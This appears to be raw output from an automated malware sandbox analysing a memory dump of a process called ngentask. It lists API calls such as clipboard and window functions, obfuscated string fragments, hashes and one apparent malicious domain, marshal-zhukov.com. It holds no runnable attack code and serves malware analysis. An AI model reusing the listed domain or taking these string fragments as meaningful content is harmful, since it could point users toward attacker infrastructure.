Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 143eb64a3b55460c315d82f57733e4fa82a727e942247282b2b0d6e3ab2a6114
• Instruction ID: 5c90e11579244bbd2ace7ce541f9c3816f34a726410f7e311f42a6b46214092b
• Opcode Fuzzy Hash: 143eb64a3b55460c315d82f57733e4fa82a727e942247282b2b0d6e3ab2a6114
• Instruction Fuzzy Hash: AAF020B290C2208BD314DA24BC60F2B7B95CFA5310F0581BCE88657392C5340C62CA82

Control-flow Graph
control_flow_graph 263 440719-44072b 264 440730-440758 263->264 264->264 265 44075a-4407ed GetForegroundWindow call 443680 264->265 268 4407f2-440815 265->268
APIs
• GetForegroundWindow.USER32 ref: 004407E4
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: be48297a947cafd24aad413243e9e9642570d7df916d39cec16fb6297b1b4795
• Instruction ID: d269cd60ec57109cef6505a058307629c74f5e3a7ebf775ef5c6d47ae3ed9ab2
• Opcode Fuzzy Hash: be48297a947cafd24aad413243e9e9642570d7df916d39cec16fb6297b1b4795
• Instruction Fuzzy Hash: 8601213A9583508FE324DB2AD44126ABA92AB8A305F08483DD982D7341D93889028B9B

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 270 439ddf-439df9 CoSetProxyBlanket
                                                                                                                      APIs
                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439DF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlanketProxy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3890896728-0
                                                                                                                      • Opcode ID: aa4dc9aeb2aac6ad379bb582322bd8c04ec0d7ac6b00bb7007832ed099619ace
                                                                                                                      • Instruction ID: 8e0993bda027286ab82495093d853fbb0d0f9e428c0d52a1ce927598f9c0f880
                                                                                                                      • Opcode Fuzzy Hash: aa4dc9aeb2aac6ad379bb582322bd8c04ec0d7ac6b00bb7007832ed099619ace
                                                                                                                      • Instruction Fuzzy Hash: DED04C347D4304BBF1310B14EC17F0535547747F03F201461B7857C0E18AF16611995E
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3861434553-0
                                                                                                                      • Opcode ID: d8b991163c7b0e0110516da00cc703152a1edba145b5b422256e62435027964e
                                                                                                                      • Instruction ID: 186d8afe7595d41557b92fe9ba1272d5117619c5063a4085c3627a12fa5ea572
                                                                                                                      • Opcode Fuzzy Hash: d8b991163c7b0e0110516da00cc703152a1edba145b5b422256e62435027964e
                                                                                                                      • Instruction Fuzzy Hash: 6BC09BFBE440045AD70027B5BC450CEB354EAC81397000573D61ED5413E635517545D6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,-$- 1'$CBA@$E|UX$H$OrvF$SRQY$^.s$`onm$kecn$nJjo$pwvu$rMnM$t{zy$vDL$wFkA$xmOT$znml${L}p$|$
                                                                                                                      • API String ID: 0-3082829593
                                                                                                                      • Opcode ID: 46fc4ddae59c42f2bec1145c203149dcdba483be0f597f81eba90ee5b336954d
                                                                                                                      • Instruction ID: 9779ffeb6b8a81ec734d8479c4d0d522fa62d7f05c387235cc8d142b68de0a8d
                                                                                                                      • Opcode Fuzzy Hash: 46fc4ddae59c42f2bec1145c203149dcdba483be0f597f81eba90ee5b336954d
                                                                                                                      • Instruction Fuzzy Hash: ACA202716083918FD724CF25D4907AFBBE2AFD6304F58892EE4C98B392D7789805CB56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: #[#]$%C3E$.K1M$2a/c$4S4U$5O"A$:G Y$;e'g$E7HI$T1`3$TW$\3W5$b_(Q
• API String ID: 0-2643699812
Strings
Similarity
• API ID:
• String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
• API String ID: 0-3131871939
Strings
Similarity
• API ID:
• String ID: (\QQ$(\QQ$BC@A$BC@A$FB[\$FB[\$W$XJ$W$XJ$[@Ar$[@Ar$[[PV$[[PV$tDYq$tDYq
• API String ID: 0-4000027297
Strings
Similarity
• API ID:
• String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
• API String ID: 0-3385986306
Strings
Similarity
• API ID:
• String ID: "Qo$$%$'Y)W$(w4q$Ug$a$ps$Q_$US
• API String ID: 0-1517657186
Strings
Similarity
• API ID:
• String ID: #Ph$$Ph$:P*>$>$e{$y5$~}$9
• API String ID: 0-1947081359
APIs
Similarity
• API ID: Clipboard$CloseDataLongOpenWindow
• String ID:
• API String ID: 1647500905-0
Strings
Similarity
• API ID:
• String ID: (\QQ$BC@A$FB[\$W$XJ$[@Ar$[[PV$tDYq
• API String ID: 0-980740811
APIs
• FindWindowExW.USER32(00000000,?,?,00000000), ref: 0041DCBB
Strings
Similarity
• API ID: FindWindow
• String ID: SQ$_]$
• API String ID: 134000473-3954728958
Strings
Similarity
• API ID:
• String ID: !3]$CR$TI$$
• API String ID: 0-3212265549
Strings
Similarity
• API ID: InitializeThunk
• String ID: $$$
• API String ID: 2994545307-533796878
Strings
Similarity
• API ID:
• String ID: $$(6+'$6910431D5D6F41B70608286674507D91$DC
• API String ID: 0-2263128210
APIs
Strings
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
Strings
Similarity
• API ID:
• String ID: -.$PY$;9$?=
• API String ID: 0-2855059432
Strings
Similarity
• API ID:
• String ID: DC$bidh$
• API String ID: 0-1136523539
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: )$)$IEND
• API String ID: 0-588110143
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: InitializeThunk
• String ID: f$
• API String ID: 2994545307-508322865
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: V^^n$kWeo
• API String ID: 0-2464879550
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: QFB$;:9
• API String ID: 0-2157042503
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: @A$u|
• API String ID: 0-1424213698
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: d$l
• API String ID: 0-91452987
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-1425349742
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: zH}F$
• API String ID: 0-987448492
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: 0$d
• API String ID: 0-1612544101
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: InitializeThunk
• String ID: $
• API String ID: 2994545307-1425349742
APIs
• FreeLibrary.KERNEL32(B9CAA089), ref: 0042F326
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• CoCreateInstance.OLE32(00446A60,00000000,00000001,00446A50), ref: 00425B19
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID:
• String ID: --%(
• API String ID: 0-2664367441
Strings
Memory Dump Source
• Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-3019521637
                                                                                                                      • Opcode ID: a62f12c785040157e8b7fec30024f87e97063765c70b64fc9a21fdd16a94ed29
                                                                                                                      • Instruction ID: 6370a15c0eadb2c0176990f0375590d17bd257baa0dd12198a9f28dd6846b8a9
                                                                                                                      • Opcode Fuzzy Hash: a62f12c785040157e8b7fec30024f87e97063765c70b64fc9a21fdd16a94ed29
                                                                                                                      • Instruction Fuzzy Hash: DE6139B5B043105BD720AF25F88173777D5EB95718F98843EE98187382E278DC05D35A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "
                                                                                                                      • API String ID: 0-123907689
                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                      • Instruction ID: c601073c496ea05fc122c30db4d8fae994325c58c904d4ae809ad3c14beac2ae
                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                      • Instruction Fuzzy Hash: 5F711B31B083358BD714CE2ED44072FB7D2ABC5710F99896FE49497391D278DC45878A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @A
                                                                                                                      • API String ID: 0-2960862460
                                                                                                                      • Opcode ID: 853bf25300ffd70dd1672832c4ab5f789289b0aa41f718e29d3b2827d7af40b0
                                                                                                                      • Instruction ID: 4719d8b980e654881bd5ae54f2d4b62ca754f3e150f2326b80e933f85abe6e03
                                                                                                                      • Opcode Fuzzy Hash: 853bf25300ffd70dd1672832c4ab5f789289b0aa41f718e29d3b2827d7af40b0
                                                                                                                      • Instruction Fuzzy Hash: 6A51EF726043118BD314CF29E8527AAB3F1FF81314F19492DEA958B3A1E778D941CB8A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: uxVd
                                                                                                                      • API String ID: 0-2172250569
                                                                                                                      • Opcode ID: 1b8588ce542fe38f60b518b41e37844cfaec0c15d9904e6db533feca748b9241
                                                                                                                      • Instruction ID: cfe32196f296b3655a051a700cb7ccaf60a1c3d8bf43f6ddb438b1d264a746a2
                                                                                                                      • Opcode Fuzzy Hash: 1b8588ce542fe38f60b518b41e37844cfaec0c15d9904e6db533feca748b9241
                                                                                                                      • Instruction Fuzzy Hash: BF414635605210EBDB259F16DC40B6BB7B6EB8C300F14982EF99547391C3BADC11CB5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                                      • Opcode ID: b5dc717f0fbba509c6785d93897d05ffe255b17a6a7ee23cbca4033ae7c97cc9
                                                                                                                      • Instruction ID: 8a1cbf2da3cce85e16e5ddc7bff621da34532a0a9f7602195c82e4c827d3f028
                                                                                                                      • Opcode Fuzzy Hash: b5dc717f0fbba509c6785d93897d05ffe255b17a6a7ee23cbca4033ae7c97cc9
                                                                                                                      • Instruction Fuzzy Hash: 1E3124711483048BE314DF58C88176BBBF4EBC9328F28892DEA9587351D37999188B6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                                      • Opcode ID: 75d1dea9b8ae6d3d52cd8fab9c8ed0d56aa657e303dc28c0bb7e37ecd5b2999d
                                                                                                                      • Instruction ID: 003cd98cb6478ae5473ed13b07942baf67a07c151dbbb83d673c0b07066971a1
                                                                                                                      • Opcode Fuzzy Hash: 75d1dea9b8ae6d3d52cd8fab9c8ed0d56aa657e303dc28c0bb7e37ecd5b2999d
                                                                                                                      • Instruction Fuzzy Hash: 0D21F875B08210DBE7188B14B59163B73A2BF5A704FB8153EE44227712C729DC26CA9E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3019521637
                                                                                                                      • Opcode ID: fce78583beccccb18dcbe4383cf36ed0bca4275cc3974188bb6dc5112421aeef
                                                                                                                      • Instruction ID: 1bc23dd65da3dd8c740786462998b77e799f5a1b88ee2868af09e1f3cb0ee478
                                                                                                                      • Opcode Fuzzy Hash: fce78583beccccb18dcbe4383cf36ed0bca4275cc3974188bb6dc5112421aeef
                                                                                                                      • Instruction Fuzzy Hash: 1901DF797086608BD7289F08A45063BB3A6FBCA704FA4563ED58127612C339EC11CBDE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                                      • Opcode ID: be7a76aebc2ca3cfc71e5c82a45ba6aa8e370cf5ff2fb2360d4394e444ec2ccd
                                                                                                                      • Instruction ID: 0a034f5f1663caace4a6bb9a836a32d191f2d6f5481833966dd2236e8cf04307
                                                                                                                      • Opcode Fuzzy Hash: be7a76aebc2ca3cfc71e5c82a45ba6aa8e370cf5ff2fb2360d4394e444ec2ccd
                                                                                                                      • Instruction Fuzzy Hash: 2D1159B0E447108FD3249B1888805B7B7A2E796315FA4642DF1C3D7265D228D993C70A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3019521637
                                                                                                                      • Opcode ID: 4ef03bff933ae179d6d4d0a0667eebb199f2544cf3e0b41afaa997531e0d8d6b
                                                                                                                      • Instruction ID: be3b5f2746f02530deb5feb29746b47a25c0387c6939b62836406c7d2f1bb1bc
                                                                                                                      • Opcode Fuzzy Hash: 4ef03bff933ae179d6d4d0a0667eebb199f2544cf3e0b41afaa997531e0d8d6b
                                                                                                                      • Instruction Fuzzy Hash: B2017C79708620DBD7189B10E45053FB7A2FBDA314FA59A2DE88123612C338EC02C7D9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3019521637
                                                                                                                      • Opcode ID: d897d307f14a83324b55d38241cd95c5d1d7233cd29fcd26d955bab2ca7c9954
                                                                                                                      • Instruction ID: c5db213e68517389fa1bacc7fe02f2657e0d406accfa76c5e8c5ae6cafa21dbc
                                                                                                                      • Opcode Fuzzy Hash: d897d307f14a83324b55d38241cd95c5d1d7233cd29fcd26d955bab2ca7c9954
                                                                                                                      • Instruction Fuzzy Hash: 7401D676608710DBD7059F04A4D153FB3A2FB85304F64292DE99113312C375EC21CBCA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: SM
                                                                                                                      • API String ID: 0-1979282939
                                                                                                                      • Opcode ID: 453dd9c33fd62f94cf89f3633494ef655db85fd5194a2ccd465a6e066069d6d9
                                                                                                                      • Instruction ID: 686e4e71a5838c5623eca8c372c09e40d61c3fe1fb4bf8d66c1442654bdc4e02
                                                                                                                      • Opcode Fuzzy Hash: 453dd9c33fd62f94cf89f3633494ef655db85fd5194a2ccd465a6e066069d6d9
                                                                                                                      • Instruction Fuzzy Hash: 5E014933E59361A7E7084B764C4602BB5B7ABD5308F1BD03ED99C97E94D83CC8418781
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                                      • Opcode ID: 0573dd715991369cdd1f280fb759e34388a203f8046d75158a62b467908f8789
                                                                                                                      • Instruction ID: 6775068db407afbd029485dd67f48e92e12a705e0908efcb34529f614b8733f4
                                                                                                                      • Opcode Fuzzy Hash: 0573dd715991369cdd1f280fb759e34388a203f8046d75158a62b467908f8789
                                                                                                                      • Instruction Fuzzy Hash: 5A019CB4A406415BEB359B14CC51BBB73E1DB85315F64443DF6C393295C678A841CB0A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: marshal-zhukov.com
                                                                                                                      • API String ID: 0-4220902806
                                                                                                                      • Opcode ID: 35afdaf516eea33ce03e6513eaf148aaf0eae721f362cd89d6e775b2e3548cf2
                                                                                                                      • Instruction ID: 99b9a3520732db4a189a64fdaa69584b650ab3ad65be4d7a7ec9059ec022e64d
                                                                                                                      • Opcode Fuzzy Hash: 35afdaf516eea33ce03e6513eaf148aaf0eae721f362cd89d6e775b2e3548cf2
                                                                                                                      • Instruction Fuzzy Hash: 20E0867854520086C314DF15C9627B373B1FF67345F04286AE583A7790E378D900C70E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e92d9e2089b5f81b34984f0e7f9c4b9ef9ccf47d19e4db63930f3c2caffc988a
                                                                                                                      • Instruction ID: 3aa304a7d0fa500fc6045f644cc37729666229ce156517ad1b57301595ece370
                                                                                                                      • Opcode Fuzzy Hash: e92d9e2089b5f81b34984f0e7f9c4b9ef9ccf47d19e4db63930f3c2caffc988a
                                                                                                                      • Instruction Fuzzy Hash: DD42A172608712CBC724DF19C8C066AB3E1FFD5315F198A3ED985A73C5D738A8518B8A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2845f90b0f95c747a555fa5bf8a918051d1958b0d98236403ea50b6d7d56deda
                                                                                                                      • Instruction ID: 1777e68b7d91d386861c3b6715b6e2e1425b0655a589d629913e829c29501dd8
                                                                                                                      • Opcode Fuzzy Hash: 2845f90b0f95c747a555fa5bf8a918051d1958b0d98236403ea50b6d7d56deda
                                                                                                                      • Instruction Fuzzy Hash: E3F1E5351047418FE729CF29C4A0762BBE2AFAA314F19D69DC4D64F793C739A806CB64
                                                                                                                      • Instruction ID: 5ffa12840469dc731bcb426f7cb35325ba097447bf8290b576edb3a554fe3c13
                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                      • Instruction Fuzzy Hash: DD112973A091D40EC32A8D3C8440665BFA34A97634F5953DAF4F89B3D2D626CD8A8359
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3c2f32ce9bc383ba00d7ed0832d78b484c6060efe00dad96bb9a55ecadd4a8a1
                                                                                                                      • Instruction ID: 47bf9c085548fa84875d00c3c5d65b3e1f87cf2bd146b3f1374b63a54812abd8
                                                                                                                      • Opcode Fuzzy Hash: 3c2f32ce9bc383ba00d7ed0832d78b484c6060efe00dad96bb9a55ecadd4a8a1
                                                                                                                      • Instruction Fuzzy Hash: 8D019EB1F00311A7D620AF19B4C1727B2A86F8570CF58053EE8089B342EBF9EC4486AD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 26ca6e44b68741cae2ba47c105817e80baac913b7d3d3ea5de346e01ce13634b
                                                                                                                      • Instruction ID: 6fd8ed32c65a67e545e30c222b7712cd34344acc3dbbb54f6c8140322037564e
                                                                                                                      • Opcode Fuzzy Hash: 26ca6e44b68741cae2ba47c105817e80baac913b7d3d3ea5de346e01ce13634b
                                                                                                                      • Instruction Fuzzy Hash: BF014935F441040BD7257A15B88067B7766EFCA364F29A43AE0D44731AC279AC128365
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                      • Instruction ID: b7fec47195b87a2ccdeee0d802a3b4902b2ff3332171a4b6b0f7a9ed850d631d
                                                                                                                      • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                      • Instruction Fuzzy Hash: 88D05B61508661469B648D1D9401577F7F0E9C7711F45655FF781D3254D334DC41C1AD
                                                                                                                      APIs
                                                                                                                      • FindWindowExW.USER32(00000000,?,?,00000000), ref: 0041E1D4
                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0041E1EF
                                                                                                                      • IsWindowVisible.USER32(?), ref: 0041E204
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
